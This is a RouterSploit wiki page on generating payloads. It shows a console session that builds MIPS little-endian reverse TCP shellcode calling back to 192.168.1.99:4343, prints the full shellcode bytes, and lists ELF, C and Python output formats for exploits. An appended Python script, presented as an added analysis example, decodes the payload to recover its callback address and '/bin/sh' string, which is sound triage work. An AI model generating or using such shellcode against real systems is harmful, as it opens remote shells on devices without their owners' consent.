Generating Payloads

Marcin Bury edited this page Oct 13, 2018 · 7 revisions

Example Payload Generation

rsf > use payloads/mipsle/reverse_tcp
rsf (MIPSLE Reverse TCP) > show options

Target options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port


Module options:

   Name         Current settings     Description
   ----         ----------------     -----------
   encoder                           Encoder
   output       python               Output type: elf/c/python
   filepath     /tmp/Pf8CV10g        Output file to write


rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.99
[+] lhost => 192.168.1.99
rsf (MIPSLE Reverse TCP) > set lport 4343
[+] lport => 4343
rsf (MIPSLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
    "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
    "\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
    "\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
    "\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
    "\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
    "\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xf7\x05\x3c\x02\x00"
    "\xa5\x34\xf8\xff\xa5\xaf\x01\x63\x05\x3c\xc0\xa8\xa5\x34\xfc"
    "\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
    "\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
    "\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
    "\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
    "\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
    "\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
    "\x01"
)

Payload Generation

Payloads can be generated in the following output formats:

  • elf - ELF binary that can be executed on the target system (the CPU architecture has to match)
  • c - payload that can be used as part of a C exploit and injected directly into memory
  • python - payload that can be used as part of a Python exploit and injected directly into memory
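As an added example (not part of this page or of the rsf project), the following Python triage script takes the python-format payload printed above and recovers the connect-back address, port and execve path it carries by decoding the MIPS little-endian lui/ori pairs. The sockaddr_in stack layout it relies on (one word for sin_family and sin_port, the next for sin_addr) is assumed from reading the session's payload, not taken from the project's code.

```python
import struct

PAYLOAD = (  # bytes exactly as printed by the rsf session above (python output)
    b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
    b"\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
    b"\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
    b"\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
    b"\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
    b"\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xf7\x05\x3c\x02\x00"
    b"\xa5\x34\xf8\xff\xa5\xaf\x01\x63\x05\x3c\xc0\xa8\xa5\x34\xfc"
    b"\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
    b"\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
    b"\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
    b"\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
    b"\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
    b"\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
    b"\x01"
)

OP_LUI, OP_ORI = 0x0F, 0x0D  # MIPS32 primary opcodes for lui and ori

def lui_ori_constants(code):
    # Return (offset, register, value) for each 32-bit constant built with a
    # lui/ori pair into the same register (MIPS has no 32-bit load immediate).
    pending, found = {}, []
    for off in range(0, len(code) - 3, 4):
        w = struct.unpack_from("<I", code, off)[0]
        op, rs, rt, imm = w >> 26, (w >> 21) & 31, (w >> 16) & 31, w & 0xFFFF
        if op == OP_LUI:
            pending[rt] = imm << 16
        elif op == OP_ORI and rs == rt and rt in pending:
            found.append((off, rt, pending.pop(rt) | imm))
    return found

def connect_back_target(code):
    # sockaddr_in is built on the stack as two words: sin_family+sin_port, then
    # sin_addr. Re-serialise each constant little-endian, as the CPU stores it.
    values = [v for _, _, v in lui_ori_constants(code)]
    for i, v in enumerate(values[:-1]):
        raw = struct.pack("<I", v)
        if struct.unpack("<H", raw[:2])[0] == 2:  # sin_family == AF_INET
            port = struct.unpack(">H", raw[2:])[0]  # sin_port is network order
            ip = ".".join(str(b) for b in struct.pack("<I", values[i + 1]))
            return ip, port
    return None

def embedded_string(code):
    # Constants whose stored bytes are printable ASCII are string data (execve path).
    chunks = [struct.pack("<I", v) for _, _, v in lui_ori_constants(code)]
    return "".join(c.decode() for c in chunks if all(32 <= b < 127 for b in c))
```

Running `connect_back_target(PAYLOAD)` on the session's payload yields the lhost and lport that were set before `run`, which is a quick way to confirm what a captured payload of this type will call back to.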